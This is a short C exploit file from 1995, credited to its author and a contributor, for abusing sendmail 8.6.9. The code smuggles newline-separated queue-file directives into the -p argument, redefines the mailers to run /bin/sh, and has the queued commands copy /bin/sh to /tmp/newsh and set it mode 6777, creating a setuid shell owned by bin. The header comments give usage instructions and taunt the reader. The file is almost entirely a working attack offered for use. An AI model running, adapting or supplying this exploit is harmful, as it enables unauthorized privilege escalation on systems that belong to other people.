smh.c

This interesting little number is to get a bin owned sh from sendmail 8.6.9.

Special thanx to RatFace for providing this code!

/* smh.c - Michael R. Widner - atreus (2/27/95)
 *  
 * a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
 * hole.  It's really just a matter of passing newlines in arguments to
 * sendmail and getting the stuff into the queue files.  If we run this
 * locally with -odq we are guaranteed that it will be queue, rather than
 * processed immediately.  Wait for the queue to get processed automatically
 * or just run sendmail -q if you're impatient.

 * usage: smh [ username [/path/to/sendmail]]

 * It's worth noting that this is generally only good for getting bin.
 * sendmail still wants to process the sendmail.cf file, which contains
 * Ou1 and Og1 most of the time, limiting you to bin access.  Is there
 * a way around this?

 * cc -o smh smh.c should do the trick.  This just creates a bin owned
 * mode 6777 copy of /bin/sh in /tmp called /tmp/newsh.  Note that on some
 * systems this is pretty much worthless, but you're smart enough to know
 * which systems those are.  Aren't you?
 */

#include 
#include 
#include 

main(argc, argv)
int argc;
char **argv;
{
        execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p",
        "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu,
A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii ",
        argv[1] ? argv[1] : "atreus",0);
}